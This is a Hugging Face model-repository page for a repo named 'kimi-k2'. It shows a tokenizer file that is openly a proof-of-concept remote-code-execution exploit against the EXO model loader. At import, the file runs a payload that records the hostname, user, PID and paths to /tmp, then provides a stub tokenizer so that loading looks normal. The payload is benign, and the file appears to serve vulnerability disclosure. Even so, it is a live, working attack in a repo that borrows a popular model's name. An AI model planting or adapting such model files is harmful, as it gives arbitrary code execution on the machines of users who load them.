Duplicated from quwsarohi/NanoAgent-135M

applexml
/

kimi-k2

Text Generation

Model card Files Files and versions

kimi-k2 / tokenization_kimi.py

applexml's picture

Upload 2 files

74b4453 verified 1 day ago

history blame contribute delete

3.07 kB

	# tokenization_kimi.py - Safe PoC stub
	# This file is executed via exec() by EXO when loading a model whose ID contains "kimi-k2".
	# It demonstrates arbitrary code execution by writing a marker file, then provides
	# the TikTokenTokenizer class that EXO expects.

	import os
	import sys
	from pathlib import Path

	# ============================================================================
	# PoC PAYLOAD - executes at module load time (when EXO calls exec() on this file)
	# ============================================================================
	POC_MARKER_FILE = "/tmp/exo_poc_marker.txt"

	def execute_payload():
	"""
	Proof-of-execution: writes a marker file with basic context info.
	Non-destructive — only creates one small file under /tmp.
	"""
	try:
	content = (
	"=== EXO RCE PoC - Code Execution Confirmed ===\n"
	f"Hostname: {os.uname().nodename}\n"
	f"User: {os.getenv('USER', 'unknown')}\n"
	f"PID: {os.getpid()}\n"
	f"Python: {sys.executable}\n"
	f"CWD: {os.getcwd()}\n"
	)
	Path(POC_MARKER_FILE).write_text(content)
	print(f"[PoC] tokenization_kimi executed — marker written to {POC_MARKER_FILE}")
	except Exception as exc:
	print(f"[PoC] Could not write marker file: {exc}")

	execute_payload()

	# ============================================================================
	# STUB TOKENIZER CLASS — required by EXO's load_tokenizer_for_model_id()
	# EXO calls:
	# hf_tokenizer = TikTokenTokenizer.from_pretrained(model_path)
	# hf_tokenizer.encode = _patched_encode (uses hf_tokenizer.model.encode)
	# So we need a .model attribute that has an .encode() method.
	# ============================================================================

	class _InnerModel:
	"""Minimal inner model that satisfies EXO's patched encode path."""
	def encode(self, text: str, allowed_special=None) -> list:
	return [ord(c) % 128 for c in (text or "")]

	def decode(self, tokens, errors="replace") -> str:
	return "".join(chr(t % 128) for t in tokens)


	class TikTokenTokenizer:
	"""
	Stub TikTokenTokenizer to satisfy EXO's tokenizer loading expectations.
	The PoC payload has already executed by the time this class is instantiated.
	"""

	def __init__(self, args, *kwargs):
	self.model = _InnerModel()
	self.eos_token_id = 151643 # <\|im_end\|> in real Kimi vocab
	self.bos_token_id = 151644
	self.pad_token_id = 151643
	self.eos_token = "<\|im_end\|>"
	self.bos_token = "<\|im_start\|>"
	print("[PoC] TikTokenTokenizer stub initialised")

	@classmethod
	def from_pretrained(cls, model_path, **kwargs):
	print(f"[PoC] TikTokenTokenizer.from_pretrained called with: {model_path}")
	return cls()

	def encode(self, text: str, **kwargs) -> list:
	return self.model.encode(text)

	def decode(self, tokens, **kwargs) -> str:
	return self.model.decode(tokens)


	print("[PoC] tokenization_kimi.py loaded successfully")